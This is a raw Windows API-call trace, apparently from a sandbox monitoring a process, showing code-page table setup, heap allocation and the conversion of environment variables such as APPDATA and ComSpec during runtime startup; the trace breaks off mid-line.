\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0083.864] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86\x8ezPäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.885] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.885] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0083.885] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0083.951] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1f) returned 0x73eaf8 [0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x73eaf8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0084.003] GetLastError () returned 0x0 [0084.003] SetLastError (dwErrCode=0x0) [0084.003] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x4) returned 0x731a00 [0084.003] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x731a00) returned 0x4 [0084.003] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x731a00, Size=0x8) returned 0x731a00 [0084.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0084.003] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2b) returned 0x73b400 [0084.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x73b400, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0084.003] GetLastError () returned 0x0 [0084.003] SetLastError (dwErrCode=0x0) [0084.003] GetLastError () returned 0x0 [0084.003] SetLastError (dwErrCode=0x0) [0084.003] GetLastError () returned 0x0 [0084.003] SetLastError (dwErrCode=0x0) [0084.034] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x731a00) returned 0x8 [0084.034] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x731a00, Size=0xc) returned 0x741568 [0084.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0084.034] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x37) returned 0x741580 [0084.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x741580, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741568) returned 0xc [0084.035] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741568, Size=0x10) returned 0x741568 [0084.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0084.035] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3c) returned 0x732508 [0084.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x732508, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0084.035] GetLastError () returned 0x0 [0084.035] SetLastError (dwErrCode=0x0) [0084.035] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741568) returned 0x10 [0084.036] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741568, Size=0x14) returned 0x7415c0 [0084.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0084.036] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x31) returned 0x7415e0 [0084.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7415e0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.036] GetLastError () returned 0x0 [0084.036] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.037] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7415c0) returned 0x14 [0084.037] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7415c0, Size=0x18) returned 0x7415c0 [0084.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0084.037] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x741620 [0084.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x741620, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0084.037] GetLastError () returned 0x0 [0084.037] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] GetLastError () returned 0x0 [0084.038] SetLastError (dwErrCode=0x0) [0084.038] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7415c0) returned 0x18 [0084.038] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7415c0, Size=0x1c) returned 0x741640 [0084.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0084.039] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x24) returned 0x73ad30 [0084.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x73ad30, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.039] GetLastError () returned 0x0 [0084.039] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x1c [0084.040] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x20) returned 0x741640 [0084.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.040] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x14) returned 0x7415c0 [0084.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x7415c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.040] SetLastError (dwErrCode=0x0) [0084.040] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] GetLastError () returned 0x0 [0084.041] SetLastError (dwErrCode=0x0) [0084.041] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x20 [0084.041] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x24) returned 0x741640 [0084.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.041] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xd) returned 0x7331c0 [0084.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x7331c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.042] SetLastError (dwErrCode=0x0) [0084.042] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x24 [0084.043] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x28) returned 0x741640 [0084.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0084.043] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1a) returned 0x73eb20 [0084.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x73eb20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.043] SetLastError (dwErrCode=0x0) [0084.043] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.044] SetLastError (dwErrCode=0x0) [0084.044] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] GetLastError () returned 0x0 [0084.045] SetLastError (dwErrCode=0x0) [0084.045] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x28 [0084.045] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x2c) returned 0x741640 [0084.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0084.045] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2e) returned 0x73b438 [0084.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x73b438, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.046] SetLastError (dwErrCode=0x0) [0084.046] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] GetLastError () returned 0x0 [0084.047] SetLastError (dwErrCode=0x0) [0084.047] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741640) returned 0x2c [0084.047] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741640, Size=0x30) returned 0x741640 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0084.047] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x19) returned 0x73eb48 [0084.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x73eb48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0084.047] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.048] SetLastError (dwErrCode=0x0) [0084.048] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] SetLastError (dwErrCode=0x0) [0084.049] GetLastError () returned 0x0 [0084.049] 